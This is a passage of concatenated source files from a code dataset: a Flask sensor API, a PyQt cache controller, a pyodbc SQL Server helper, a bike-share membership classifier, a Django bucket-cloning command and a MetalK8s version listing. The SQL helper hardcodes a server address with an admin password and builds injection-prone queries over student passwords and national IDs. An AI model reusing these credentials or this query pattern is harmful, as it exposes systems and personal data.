active_session.query(EnvironmentTPH).order_by(EnvironmentTPH.created_at.desc()).limit(qty).all()\n enviro_dict = {}\n for row in enviro:\n enviro_dict[row.id] = {\n 'created_at': row.created_at,\n 'host_mac': row.device_mac,\n 'humidity': row.humidity,\n 'host_name': row.device_name,\n 'id': row.id,\n 'serial': row.device_serial,\n\n }\n return jsonify(enviro_dict)\n\n\n@app.route(\"/api/humidity\")\ndef humidity_latest():\n return humidity(1)\n\n\ndef get_api_environment():\n return {\"error\": \"Route note implemented\",\n \"temperature\": None,\n \"pressure\": None,\n \"humidity\": None,}\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"monitor_ii/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"188301155","text":"from PyQt5.QtWidgets import QSizePolicy\nfrom PyQt5.QtCore import QObject, pyqtSignal\n\nfrom ui.cache_tree_view import CacheTreeView\nfrom core.data_base import DataBase\n\n\nclass CacheController(QObject):\n item_edited = pyqtSignal(int, str)\n\n def __init__(self, parent=None):\n super(CacheController, self).__init__(parent)\n\n self.__cache_data_base = DataBase()\n\n self.__cache_tree_view = CacheTreeView()\n self.__cache_tree_view.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n\n self.__cache_tree_view.item_changed.connect(self.on_item_changed)\n\n def tree_view(self):\n return self.__cache_tree_view\n\n def reset(self):\n self.__cache_data_base.clear()\n self.__cache_tree_view.clear()\n\n def __update_tree_view(self):\n self.__cache_tree_view.clear()\n\n for item_id, v in self.sorted_data().items():\n self.__add_tree_item(item_id, v)\n\n self.__cache_tree_view.expand_all()\n\n def __add_tree_item(self, item_id, item):\n self.__cache_tree_view.add_item(item_id,\n item.parent_id,\n item.value,\n item.exists)\n\n def add_item(self, item_id, item):\n added_item_exists = True\n\n if self.__cache_data_base.has_item(item.parent_id) and not self.__cache_data_base.get_item(item.parent_id).exists:\n item.exists = False\n added_item_exists = False\n\n self.__cache_data_base.add_item(item_id, item)\n\n self.__update_tree_view()\n\n return added_item_exists\n\n def sorted_data(self):\n new_dict = self.__cache_data_base.get_data()\n sorted_dict = {}\n added_parent_ids = []\n\n while new_dict:\n for key, value in new_dict.items():\n if value.parent_id not in self.__cache_data_base.get_ids() or value.parent_id in added_parent_ids:\n sorted_dict[key] = value\n new_dict.pop(key)\n added_parent_ids.append(key)\n break\n\n return sorted_dict\n\n def remove_item(self, item_id):\n self.__remove_item(item_id)\n self.__update_tree_view()\n\n def __remove_item(self, item_id):\n item = self.__cache_data_base.get_item(item_id)\n\n if not item:\n return\n\n item.exists = False\n\n for key, value in self.__cache_data_base.get_items():\n if value.parent_id == item_id:\n self.remove_item(key)\n\n def get_item(self, item_id):\n return self.__cache_data_base.get_item(item_id)\n\n def on_item_changed(self, item_id, value):\n if self.__cache_data_base.has_item(item_id):\n self.__cache_data_base.edit_item(item_id, value)\n\n self.item_edited.emit(item_id, value)\n\n def selected_item(self):\n selected_id = self.__cache_tree_view.selected_item_id()\n\n if selected_id is None:\n return None, None\n\n selected_item_id = selected_id if self.__cache_data_base.has_item(selected_id) else None\n\n return selected_item_id, self.__cache_data_base.get_item(selected_item_id)\n\n def enter_item_edit_mode(self, item_id):\n if self.__cache_data_base.has_item(item_id):\n self.__cache_tree_view.enter_item_edit_mode(item_id)\n","sub_path":"core/cache_controller.py","file_name":"cache_controller.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"54983107","text":"# -*- coding:utf-8 -*\n\nimport pyodbc\ncnxn = pyodbc.connect('DRIVER={SQL Server};SERVER=222.204.233.239;DATABASE=CollectDB;UID=sa;PWD=ecnu409s')\ncursor = cnxn.cursor()\n\n\ndef get_data(db_name,table_name,conditions,items = '*',order_by = None):\n if order_by == None:\n sql_qur = \"SELECT \" + items + \" FROM \" + \"[\" + db_name + \"]\" + \".\" + \"[dbo]\" + \".\" + \"[\" + table_name + \"]\" + \" WHERE \" + conditions\n else:\n sql_qur = \"SELECT \" + items + \" FROM \" + \"[\" + db_name + \"]\" + \".\" + \"[dbo]\" + \".\" + \"[\" + table_name + \"]\" + \" WHERE \" + conditions + ' order by ' + order_by\n cursor.execute(sql_qur)\n data = cursor.fetchall()\n return data\n\n\ndef get_student_info(student_id):\n \"\"\"\n 根据学生的学号获取学生的信息\n :param student_id: 学生的学号\n :return: 以字典的的形式返回学生的所有信息,字典的键为customer_id\\card_number\\name\\student_id\\sex\\department\\pass_word\\make_card_date\\national_date\n \"\"\"\n student = {}\n sql_qur = \"SELECT * FROM [CollectDB].[dbo].[Customer] WHERE OutID = '{}'\".format(student_id)\n try:\n cursor.execute(sql_qur)\n student_info = cursor.fetchone()\n student['customer_id'] = student_info[0]\n student['card_number'] = student_info[1]\n student['name'] = student_info[2]\n student['student_id'] = student_info[3]\n student['sex'] = student_info[4]\n student['department'] = student_info[6]\n student['pass_word'] = student_info[7]\n student['make_card_date'] = student_info[8]\n student['national_id'] = student_info[11]\n\n except Exception as e:\n return False\n return student\n\n\n\n\n\n\n\n\n","sub_path":"DataBase/connectSqlServer.py","file_name":"connectSqlServer.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"94891683","text":"#!/usr/bin/env python3\n\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorflow.keras as ks\nimport matplotlib.pyplot as plt\n\nimport keras.utils.np_utils as ks_utils\nimport keras.regularizers as reg\n\nfrom sklearn.utils import shuffle\nfrom sklearn.linear_model import LinearRegression\n\n\n'''\nAuthor : Gustav Baardsen\nFirst version : January 2019 \n\nA program to predict the class of biker based on data such\nas duration, start station, end station, and bike ID.\n\nThe exercise was suggested on\nhttps://www.analyticsvidhya.com/blog/2018/05/24-ultimate-data-science-projects-to-boost-your-knowledge-and-skills/\nunder the title 'Trip history data set'.\n\nThe required data may be downloaded from\nhttps://s3.amazonaws.com/capitalbikeshare-data/index.html\n\n\nTo write the code below, the tutorial\n\nhttps://www.tensorflow.org/tutorials/keras/basic_classification\n\nwas useful.\n\n'''\n\n\nclass BikingData:\n \n def __init__(self,\n data_file):\n \n self.data = pd.read_csv(data_file)\n \n # Randomly shuffle the rows\n self.data = shuffle(self.data)\n #print(self.data)\n \n # Replace categories by numbers\n self.data['Bike number'] = \\\n self.data['Bike number'].astype('category').cat.codes\n self.data['Member type'] = \\\n self.data['Member type'].astype('category').cat.codes\n \n # Remove columns with categories that are not numbers\n self.data = self.data.drop(['Start date',\n 'End date',\n 'Start station',\n 'End station'],\n axis = 1)\n #print(self.data)\n \n def get_categories(self):\n return self.data.columns\n \n def get_columns(self, col_indices):\n return self.data.get_values()[:, col_indices]\n \n def get_array(self):\n return self.data.get_values()\n\n def print_categories(self):\n \n print('\\nCategories in the data:\\n')\n variables = self.get_categories()\n for i in range(variables.shape[0]):\n print(' ', variables[i])\n \n print('')\n\n def get_values(self,\n variable,\n member_type):\n '''\n Get all values of 'variable' that are associated with\n 'member_type'.\n '''\n member_labels = self.data['Member type'].values\n \n if member_type == 'Casual':\n member_id = 0\n elif member_type == 'Member':\n member_id = 1\n \n this_type = (member_labels.astype(int) == member_id)\n \n return self.data[variable].values[this_type]\n \n def plot_histogram(self,\n variable,\n min_x = None,\n max_x = None):\n '''\n For 'variable', plot separate histograms associated \n with members and non-members.\n '''\n \n # member_labels = self.data['Member type'].values \n \n # members = (member_labels.astype(int) == 1)\n # casuals = np.logical_not(members)\n \n # values_members = variable_values[members]\n # values_casuals = variable_values[casuals]\n\n values_members = self.get_values(variable,\n 'Member')\n values_casuals = self.get_values(variable,\n 'Casual')\n\n variable_values = self.data[variable].values\n \n min_value = np.amin(variable_values)\n max_value = np.amax(variable_values)\n\n if min_x is None:\n min_x = min_value\n if max_x is None:\n max_x = max_value\n \n n_bins = 100\n bin_array = np.linspace(min_x,\n max_x,\n 100) \n plt.hist(values_members, \n bins = bin_array, \n color = 'b',\n histtype = 'step',\n label='Members')\n plt.hist(values_casuals,\n bins = bin_array,\n color = 'r',\n histtype = 'step',\n fill = False,\n label = 'Casuals')\n plt.xlim(min_x, max_x)\n plt.legend(prop={'size': 10})\n plt.xlabel(variable + ' (s)')\n plt.ylabel('Number of smaples')\n\n # Save the plot\n name = 'histogram_' + variable \n plt.savefig(name + '.pdf', format='pdf', dpi=500)\n \n plt.show()\n \n \n \ndef normalize_columns(data):\n '''\n Normalize the columns of the array 'data' so that\n the mean is zero and the standard deviation is one.\n \n data : data[i, j] is the sample i for variable j.\n '''\n \n m = 'Error. The parameter \"data\" must be a ' + \\\n 'two-dimensional Numpy.'\n assert len(data.shape) == 2, m\n \n mu = np.mean(data, axis = 0)\n s = np.std(data, axis = 0, ddof = 1)\n \n return (data - mu) / s\n\n\ndef split_columns(data, ratios):\n '''\n Split the columns of the set 'data' into three parts\n according to 'ratios'.\n '''\n assert (len(ratios) == 2) and \\\n (ratios[0] + ratios[1] < 1.0)\n \n n_total = data.shape[0]\n n1 = int(ratios[0] * n_total)\n n2 = min(n1 + int(ratios[1] * n_total),\n n_total)\n \n return data[:n1, :], data[n1:n2, :], data[n2:, :]\n\n\ndef split_data_5050(in_data, out_data):\n '''\n Assume that 'out_data' contains two columns with binary\n classes. Then this functions removes data samples so that\n both classes are represented by an equal amount of \n samples.\n '''\n # Get boolean arrays corresponding to the two classes\n class_0 = (out_data[:, 0].astype(int) == 1)\n class_1 = np.logical_not(class_0)\n\n # Get separate arrays corresponding to the two classes\n [input_0, output_0] = \\\n [in_data[class_0], out_data[class_0]]\n [input_1, output_1] = \\\n [in_data[class_1], out_data[class_1]]\n \n n0 = input_0.shape[0]\n n1 = input_1.shape[0]\n \n n_min = min(n0, n1)\n if n0 < n1:\n \n input_1_50 = input_1[:n_min, :]\n output_1_50 = output_1[:n_min, :] \n\n input_50 = np.append(input_1_50,\n input_0,\n axis = 0)\n output_50 = np.append(output_1_50,\n output_0,\n axis = 0)\n \n elif n0 >= n1:\n\n input_0_50 = input_0[:n_min, :]\n output_0_50 = output_0[:n_min, :]\n\n input_50 = np.append(input_0_50,\n input_1,\n axis = 0)\n output_50 = np.append(output_0_50,\n output_1,\n axis = 0)\n\n # Randomly shuffle the rows\n indices = np.arange(2 * n_min)\n np.random.shuffle(indices)\n\n return input_50[indices, :], output_50[indices, :]\n\n\ndef analyse_output_ratios(predicted_members,\n output_members):\n '''\n '''\n n_all = output_members.shape[0]\n n_pred_member = np.count_nonzero(predicted_members)\n print('\\nNumber of samples predicted as member :',\n '{:>10}'.format(n_pred_member))\n print('Number of samples predicted as non-member :',\n '{:>10}'.format(n_all - n_pred_member))\n \n n_dev_member = np.sum(output_members)\n ratio_nonmember_dev = \\\n float(n_all - n_dev_member) / float(n_all)\n print('\\nTrue ratio (non-members / all) :',\n '{0:14.4f}'.format(ratio_nonmember_dev))\n \n ratio_nonmember_pred = \\\n float(n_all - n_pred_member) / float(n_all)\n print('Predicted ratio (non-members / all) :',\n '{0:14.4f}'.format(ratio_nonmember_pred))\n \n \n ratio_member = \\\n ratio_correctly_predicted_true(predicted_members,\n output_members)\n print('\\nRatio of members that were correctly predicted as members:\\n',\n '{0:14.4f}'.format(ratio_member))\n\n ratio_nonmember = \\\n ratio_correctly_predicted_false(predicted_members,\n output_members)\n print('\\nRatio of non-members that were correctly predicted as non-member:\\n',\n '{0:14.4f}'.format(ratio_nonmember), \n '\\n')\n \n\ndef get_train_test_dev_sets(input_data,\n output_data,\n ratios_train_dev = [0.8, 0.199]):\n '''\n Divide the data set into training, development, and test\n sets.\n '''\n # Normalize the data\n input_norm = normalize_columns(input_data)\n #output_norm = normalize_columns(output_data)\n \n # Divide into training and test sets\n in_train, in_dev, in_test = \\\n split_columns(input_norm,\n ratios_train_dev)\n out_train, out_dev, out_test = \\\n split_columns(output_data,\n ratios_train_dev)\n \n n_train = in_train.shape[0]\n n_dev = in_dev.shape[0] \n n_test = in_test.shape[0] \n print('\\nSize of training set : ',\n '{:>20}'.format(n_train))\n print('Size of development set : ',\n '{:>20}'.format(n_dev))\n print('Size of test set : ',\n '{:>20}'.format(n_test),\n '\\n')\n \n return in_train, in_dev, in_test, \\\n out_train, out_dev, out_test\n\n\ndef setup_trained_network(x_train,\n y_train,\n opt_algorithm = 'adam',\n loss_function = 'mean_absolute_percentage_error',\n error_metrics = ['accuracy'],\n n_per_layer = [8, 8, 8],\n n_iterations = 1,\n n_batch = 30,\n reg_parameters = [0.01, 0.01]):\n '''\n Train a neural network with a given number of layers.\n '''\n \n # Construct a neural network\n network = ks.Sequential()\n network.add(ks.layers.Dense(units = n_per_layer[0],\n activation = tf.nn.relu,\n kernel_regularizer = reg.l1_l2(l1 = reg_parameters[0],\n l2 = reg_parameters[1]),\n input_shape = x_train[0].shape))\n for i in range(1, len(n_per_layer)):\n network.add(ks.layers.Dense(units = n_per_layer[i],\n activation = tf.nn.relu,\n kernel_regularizer = reg.l1_l2(l1 = reg_parameters[0],\n l2 = reg_parameters[1])))\n \n network.add(ks.layers.Dense(units = y_train.shape[1],\n activation = tf.nn.softmax,\n kernel_regularizer = reg.l1_l2(l1 = reg_parameters[0],\n l2 = reg_parameters[1])))\n \n # Choose the optimization method and error metrics\n network.compile(optimizer = opt_algorithm,\n loss = loss_function,\n metrics = error_metrics)\n # Train the neural network\n network.fit(x_train,\n y_train,\n epochs = n_iterations,\n batch_size = n_batch)\n \n return network\n\n\ndef ratio_correctly_predicted_false(predictions,\n labels):\n '''\n Compute the ratio of correctly predicted false values.\n '''\n sum_labels = predictions + labels\n\n n_labels = labels.shape[0]\n n_false = n_labels - np.count_nonzero(labels)\n n_correctly_pred_false = n_labels - \\\n np.count_nonzero(sum_labels)\n return float(n_correctly_pred_false) / float(n_false)\n\n\ndef ratio_correctly_predicted_true(predictions,\n labels):\n '''\n Compute the ratio of correctly predicted true values.\n '''\n correctly_predicted_true = predictions * labels\n\n n_true = np.count_nonzero(labels)\n n_correctly_pred_true = np.sum(correctly_predicted_true)\n \n return float(n_correctly_pred_true) / float(n_true)\n \n\ndef classify_from_float_0_1(predictions):\n '''\n predictions : Array with float numbers between zero \n and one, representing probabilities\n for zero and one.\n '''\n return (predictions > 0.5).astype(int)\n\n\ndef ratio_same_value(array1,\n array2):\n '''\n Ratio of elements that are the same in both arrays.\n '''\n m = 'The input arrays \"array1\" and \"array2\" must ' + \\\n 'both be Numpy arrays of the same lenght and ' + \\\n 'type int.'\n assert (type(array1) == np.ndarray) and \\\n (type(array2) == np.ndarray) and \\\n (array1.dtype == int) and \\\n (array2.dtype == int) and \\\n (array1.shape == array2.shape), m\n \n n_total = array1.shape[0]\n n_same = np.sum(array1 == array2)\n \n return float(n_same) / float(n_total)\n\n\nclass NNPredictor:\n '''\n Class for prediciton using a neural network.\n '''\n network = None\n \n def __init__(self,\n input_train,\n input_dev,\n input_test,\n output_train,\n output_dev,\n output_test):\n \n self.in_train = input_train\n self.in_dev = input_dev\n self.in_test = input_test\n self.out_train = output_train\n self.out_dev = output_dev\n self.out_test = output_test\n \n def train_network(self,\n optimization = 'adam',\n loss = tf.losses.softmax_cross_entropy,\n metrics = ['accuracy'],\n n_neurons = [8, 8, 8],\n n_mainloop = 4,\n batch_size = 30,\n reg_params = [0.01, 0.01]):\n '''\n Train a neural network using self.x_train and \n self.y_train.\n '''\n self.network = setup_trained_network(self.in_train,\n self.out_train,\n opt_algorithm = optimization,\n loss_function = loss,\n error_metrics = metrics,\n n_per_layer = n_neurons,\n n_iterations = n_mainloop,\n n_batch = batch_size,\n reg_parameters = reg_params)\n \n def validate(self,\n input_val,\n output_val,\n plot = False):\n '''\n Validate the trained network.\n '''\n m = 'Error. The neural network has not been trained.'\n assert self.network is not None, m\n \n # Test the optimized network\n loss, metrics = self.network.evaluate(input_val,\n output_val)\n print('\\nError in the development set:')\n print('\\nLoss:', loss)\n print('Accuracy:', metrics, '\\n')\n\n \n if plot:\n\n predictions = self.network.predict(input_val)\n \n n = input_val.shape[0]\n points = np.arange(n)\n \n predict = np.argmax(predictions,\n axis = 1)\n output_dev = np.argmax(output_val,\n axis = 1)\n \n v = Visualiser1D(x_points = [points, points],\n y_points = [output_dev, predict],\n colors = ['b', 'r'],\n markers = ['s', '^'],\n linetypes = ['None', 'None'],\n labels = ['Correct values', 'Predictions'])\n n_plots = 10\n for i in range(n_plots):\n v.make_plot(x_limits = [50*i, 50*(i+1)],\n y_limits = [0, 1.5])\n \n def test(self):\n '''\n Test the trained network.\n '''\n predictions = network.predict(self.in_test)\n print('\\nPrediction; Correct value')\n for i in range(self.in_test.shape[0]):\n \n print(predictions[i, 0], self.out_test[i, 0])\n #print(x_test[i, :], y_test[i, 0])\n \n print('')\n\n def get_predictions(self,\n in_data):\n predictions_float = self.network.predict(in_data)\n return np.argmax(predictions_float,\n axis = 1)\n\n\ndef plot_covariance(data):\n '''\n Plot the covariance matrix of 'data'.\n \n data : data[i, j] is the sample i for variable j.\n '''\n normalized_data = normalize_columns(data)\n covariance = np.cov(np.transpose(normalized_data), ddof = 1)\n \n print('\\nCovariance matrix for the data:\\n')\n n = covariance.shape[0]\n \n for i in range(n):\n for j in range(n):\n print('{0: .4E}'.format(covariance[i, j]),\n end = \" \")\n print('')\n print('')\n \n \n plt.imshow(np.absolute(covariance))\n plt.colorbar()\n \n plt.title('Absolute values of the covariance matrix')\n \n items = np.arange(n, dtype=int)\n values = ['Duration',\n 'Start station',\n 'End station',\n 'Bike',\n 'Member type']\n plt.xticks(items, values, size = 8)\n plt.yticks(items, values, size = 8)\n\n # Save the plot\n name = 'covariance' \n plt.savefig(name + '.pdf', format='pdf', dpi=500)\n \n plt.show()\n\n \n \n \nclass Visualiser1D:\n '''\n Class for 1D plots.\n '''\n def __init__(self,\n x_points,\n y_points,\n colors,\n markers,\n linetypes,\n labels):\n \n m = 'Error. The lists x_points, y_points, and ' + \\\n 'labels must have the same lengths.'\n assert (len(x_points) == len(y_points)) and \\\n (len(labels) == len(x_points)) and \\\n (len(colors) == len(x_points)) and \\\n (len(markers) == len(x_points)) and \\\n (len(linetypes) == len(linetypes)), m\n \n for i in range(len(x_points)):\n m = 'Error. Each Numpy array x_points[i] must ' + \\\n 'have the same lenght as the corresponding ' + \\\n 'array y_points[i].'\n assert x_points[i].shape == y_points[i].shape, m\n \n self.x_points = x_points\n self.y_points = y_points\n self.colors = colors\n self.markers = markers\n self.linetypes = linetypes\n self.labels = labels\n \n def make_plot(self,\n legend_location = 'upper right',\n line_type = 'None',\n x_limits = None,\n y_limits = None):\n \n fig = plt.figure(figsize=(7, 7), dpi=100)\n ax = plt.gca()\n \n n_graphs = len(self.x_points)\n for i in range(n_graphs):\n \n ax.plot(self.x_points[i],\n self.y_points[i],\n color = self.colors[i],\n marker = self.markers[i],\n linestyle = self.linetypes[i],\n label = self.labels[i])\n \n # Legend\n l = plt.legend(loc = legend_location,\n labelspacing = 0.1)\n frame = l.get_frame()\n frame.set_lw(0.6)\n \n ax.set_xlim(x_limits)\n ax.set_ylim(y_limits)\n \n plt.show()\n \n \ndef main():\n \n #\n # Before running the program, download the data from\n #\n # https://s3.amazonaws.com/capitalbikeshare-data/index.html\n #\n # The program is run by calling ./analysis.py.\n #\n data_file = '2017Q1-capitalbikeshare-tripdata.csv'\n \n data = BikingData(data_file)\n\n data.print_categories()\n data.plot_histogram('Duration',\n max_x = 10000)\n data.plot_histogram('Start station number')\n data.plot_histogram('End station number')\n data.plot_histogram('Bike number')\n \n input_data = data.get_array()[:, :4]\n output_data = data.get_array()[:, 4:5]\n \n\n # Plot the covariance matrix between the variables\n plot_covariance(data.get_array())\n \n \n output_data_c = ks_utils.to_categorical(output_data,\n num_classes = 2)\n \n # Partition the data set into training, development,\n # and test sets. The input and output data are also\n # normalized.\n input_train, input_dev, input_test, \\\n output_train, output_dev, output_test = \\\n get_train_test_dev_sets(input_data,\n output_data_c)\n \n # First, classify using linear regression with\n # a least-squares error functional\n regressor = LinearRegression()\n regressor.fit(input_train,\n output_train[:, 1])\n output_linreg = regressor.predict(input_dev)\n\n predictions_reg = \\\n classify_from_float_0_1(output_linreg)\n correct_members = \\\n output_dev[:, 1].astype(int)\n accuracy = ratio_same_value(predictions_reg,\n correct_members)\n print('\\nClassification accuracy of linear regression:',\n accuracy,\n '\\n')\n\n \n # Create a neural-network predictor object\n analyser = NNPredictor(input_train,\n input_dev,\n input_test,\n output_train,\n output_dev,\n output_test)\n \n opt_algorithm = 'adam'\n loss_function = tf.losses.softmax_cross_entropy\n error_metrics = ['accuracy']\n n_per_layer = [4, 4, 4]\n n_iterations = 4\n n_batch = 500\n reg_parameters = [0.0, 0.0]\n \n print('Next, a neural network is trained...')\n analyser.train_network(optimization = opt_algorithm,\n loss = loss_function,\n metrics = error_metrics,\n n_neurons = n_per_layer,\n n_mainloop = n_iterations,\n batch_size = n_batch,\n reg_params = reg_parameters)\n\n make_plots = True\n analyser.validate(analyser.in_dev,\n analyser.out_dev,\n plot = make_plots)\n \n # Array containing ones for 'Member' and zeros for 'Casual'\n predicted_members = \\\n analyser.get_predictions(analyser.in_dev)\n output_members_dev = \\\n output_dev[:, 1].astype(int)\n \n analyse_output_ratios(predicted_members,\n output_members_dev)\n #print(data.get_categories())\n \n \nif __name__ == \"__main__\":\n main()\n \n \n \n","sub_path":"capitalbike/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":23160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"94430377","text":"from django.core.files.storage import default_storage\nfrom django.core.management.base import BaseCommand\nfrom django.core.management import call_command\n\n\nclass Command(BaseCommand):\n help = 'Clone one bucket to another'\n args = '(, )'\n\n def handle(self, *args, **options):\n SOURCE_BUCKET_NAME = args[0]\n DESTINATION_BUCKET_NAME = args[1]\n if DESTINATION_BUCKET_NAME == SOURCE_BUCKET_NAME:\n return\n connection = default_storage.connection\n source_bucket = connection.get_bucket(SOURCE_BUCKET_NAME)\n destination_bucket = connection.get_bucket(DESTINATION_BUCKET_NAME)\n destination_bucket.delete_keys(destination_bucket.list())\n for key in source_bucket.list():\n key.copy(DESTINATION_BUCKET_NAME, key.name)\n","sub_path":"libs/common/management/commands/clone_bucket.py","file_name":"clone_bucket.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358345221","text":"# coding: utf-8\n\n\n\"\"\"Authoritative listing of image and package versions used in the project.\n\nThis module MUST be kept valid in a standalone context, since it is intended\nfor use in tests and documentation as well.\n\"\"\"\nimport operator\nimport json\n\nfrom collections import namedtuple\nfrom pathlib import Path\nfrom typing import Any, cast, Dict, Optional, Tuple\n\n\nImage = namedtuple(\"Image\", (\"name\", \"version\", \"digest\"))\n\n# Project-wide versions {{{\n\nCALICO_VERSION: str = \"3.19.1\"\nK8S_VERSION: str = \"1.21.2\"\nSALT_VERSION: str = \"3002.6\"\nCONTAINERD_VERSION: str = \"1.4.3\"\nSOS_VERSION: str = \"< 4.0\"\n\nCALICO_RELEASE: str = \"1\"\nCONTAINERD_RELEASE: str = \"3\"\nSOSREPORT_RELEASE: str = \"2\"\n\n\ndef load_version_information() -> None:\n \"\"\"Load version information from `VERSION`.\"\"\"\n to_update = {\"VERSION_MAJOR\", \"VERSION_MINOR\", \"VERSION_PATCH\", \"VERSION_SUFFIX\"}\n with VERSION_FILE.open(\"r\", encoding=\"utf-8\") as fp:\n for line in fp:\n name, _, value = line.strip().partition(\"=\")\n # Don't overwrite random variables by trusting an external file.\n var = name.strip()\n if var in to_update:\n globals()[var] = value.strip()\n\n\nREPO_ROOT = (Path(__file__) / \"../../../\").resolve()\nVERSION_FILE = REPO_ROOT / \"VERSION\"\n\n# Metalk8s version.\n# (Those declarations are not mandatory, but they help pylint and mypy).\nVERSION_MAJOR: str\nVERSION_MINOR: str\nVERSION_PATCH: str\nVERSION_SUFFIX: str\n\nload_version_information()\n\nSHORT_VERSION: str = \"{}.{}\".format(VERSION_MAJOR, VERSION_MINOR)\nVERSION: str = \"{}.{}{}\".format(SHORT_VERSION, VERSION_PATCH, VERSION_SUFFIX)\n\n# Get shell ui version from package.json\nshell_ui_package_contents = (REPO_ROOT / \"shell-ui/package.json\").read_text(\n encoding=\"utf-8\"\n)\nSHELL_UI_VERSION: str = json.loads(shell_ui_package_contents)[\"version\"]\n\n# }}}\n# Container images {{{\n\nCENTOS_BASE_IMAGE: str = \"docker.io/centos\"\nCENTOS_BASE_IMAGE_SHA256: str = (\n # centos:7.9.2009\n \"e4ca2ed0202e76be184e75fb26d14bf974193579039d5573fb2348664deef76e\"\n)\n\nNGINX_IMAGE_VERSION: str = \"1.19.6-alpine\"\nNODEJS_IMAGE_VERSION: str = \"14.16.0\"\n\n# Current build IDs, to be augmented whenever we rebuild the corresponding\n# image, e.g. because the `Dockerfile` is changed, or one of the dependencies\n# installed in the image needs to be updated.\n# This should be reset to 1 when the service exposed by the container changes\n# version.\nSALT_MASTER_BUILD_ID = 1\n\n\ndef _version_prefix(version: str, prefix: str = \"v\") -> str:\n return \"{}{}\".format(prefix, version)\n\n\n# Digests are quite a mouthful, so:\n# pylint:disable=line-too-long\nCONTAINER_IMAGES: Tuple[Image, ...] = (\n # Remote images\n Image(\n name=\"alertmanager\",\n version=\"v0.22.2\",\n digest=\"sha256:624c1a5063c7c80635081a504c3e1b020d89809651978eb5d0b652a394f3022d\",\n ),\n Image(\n name=\"calico-node\",\n version=_version_prefix(CALICO_VERSION),\n digest=\"sha256:bc4a631d553b38fdc169ea4cb8027fa894a656e80d68d513359a4b9d46836b55\",\n ),\n Image(\n name=\"calico-kube-controllers\",\n version=_version_prefix(CALICO_VERSION),\n digest=\"sha256:904458fe1bd56f995ef76e2c4d9a6831c506cc80f79e8fc0182dc059b1db25a4\",\n ),\n Image(\n name=\"coredns\",\n version=\"v1.8.0\",\n digest=\"sha256:cc8fb77bc2a0541949d1d9320a641b82fd392b0d3d8145469ca4709ae769980e\",\n ),\n Image(\n name=\"dex\",\n version=\"v2.28.1\",\n digest=\"sha256:5e88f2205de172b60fd7af23ac92f34321688a83de9f7de7c9a6f394f6950877\",\n ),\n Image(\n name=\"etcd\",\n version=\"3.4.13-0\",\n digest=\"sha256:4ad90a11b55313b182afc186b9876c8e891531b8db4c9bf1541953021618d0e2\",\n ),\n Image(\n name=\"grafana\",\n version=\"8.0.1\",\n digest=\"sha256:1c3e2fc7896adf9e33be5d062c08066087cb556f63b0a95f8aefe92bd37a6f38\",\n ),\n Image(\n name=\"k8s-sidecar\",\n version=\"1.12.2\",\n digest=\"sha256:ca760f94b35eb78575b170e41d1e19e27359b29245dacfd1c42ae90452ecc08e\",\n ),\n Image(\n name=\"kube-apiserver\",\n version=_version_prefix(K8S_VERSION),\n digest=\"sha256:c86c3855e360b1483008c30c8deaed2b1a92f63eaacec819a90a0ffe04df152b\",\n ),\n Image(\n name=\"kube-controller-manager\",\n version=_version_prefix(K8S_VERSION),\n digest=\"sha256:2ea5e2885485fc20aaa15a0033d50e47ce7c559bf292741c16604984088bd700\",\n ),\n Image(\n name=\"kube-proxy\",\n version=_version_prefix(K8S_VERSION),\n digest=\"sha256:3ee783402715225d6bc483b3a2f8ea11adcb997d00fb5ca2f74734023ade0561\",\n ),\n Image(\n name=\"kube-scheduler\",\n version=_version_prefix(K8S_VERSION),\n digest=\"sha256:d372f36741c015e30d36aef958a021de4af7218c467edac91796fb03aab478b4\",\n ),\n Image(\n name=\"kube-state-metrics\",\n version=\"v2.0.0\",\n digest=\"sha256:eb2f41024a583e8795213726099c6f9432f2d64ab3754cc8ab8d00bdbc328910\",\n ),\n Image(\n name=\"nginx\",\n version=NGINX_IMAGE_VERSION,\n digest=\"sha256:629df02b47c8733258baf6663e308a86cd23f80247d35407022c35fd91a50ea3\",\n ),\n Image(\n name=\"nginx-ingress-controller\",\n version=\"v0.47.0\",\n digest=\"sha256:a1e4efc107be0bb78f32eaec37bef17d7a0c81bec8066cdf2572508d21351d0b\",\n ),\n Image(\n name=\"nginx-ingress-defaultbackend-amd64\",\n version=\"1.5\",\n digest=\"sha256:4dc5e07c8ca4e23bddb3153737d7b8c556e5fb2f29c4558b7cd6e6df99c512c7\",\n ),\n Image(\n name=\"node-exporter\",\n version=\"v1.1.2\",\n digest=\"sha256:22fbde17ab647ddf89841e5e464464eece111402b7d599882c2a3393bc0d2810\",\n ),\n Image(\n name=\"metallb-controller\",\n version=\"0.10.2-debian-10-r0\",\n digest=\"sha256:573792b177b3fbe2c645f0d4fa084b3d6b8dbb6e0510fac00b0aa256d8315299\",\n ),\n Image(\n name=\"metallb-speaker\",\n version=\"0.10.2-debian-10-r0\",\n digest=\"sha256:8dc5efb75ef21f9052265d6c1571199b0542515cd4a23349c8590c67f9f01b1b\",\n ),\n Image(\n name=\"pause\",\n version=\"3.2\",\n digest=\"sha256:80d28bedfe5dec59da9ebf8e6260224ac9008ab5c11dbbe16ee3ba3e4439ac2c\",\n ),\n Image(\n name=\"prometheus\",\n version=\"v2.27.1\",\n digest=\"sha256:5accb68b56ba452e449a5e552411acaeabbbe0f087acf19a1157ce3dd10a8bed\",\n ),\n Image(\n name=\"k8s-prometheus-adapter-amd64\",\n version=\"v0.8.4\",\n digest=\"sha256:a906f32c5ed3754acd6b197b730cc244a2103f86ac8a1522f55e9c5ea26f820a\",\n ),\n Image(\n name=\"prometheus-config-reloader\",\n version=\"v0.48.1\",\n digest=\"sha256:9bed3dae8023c7a83b906c6c8abd92900697fb3806f14b7f2dbfbc37fe4b7941\",\n 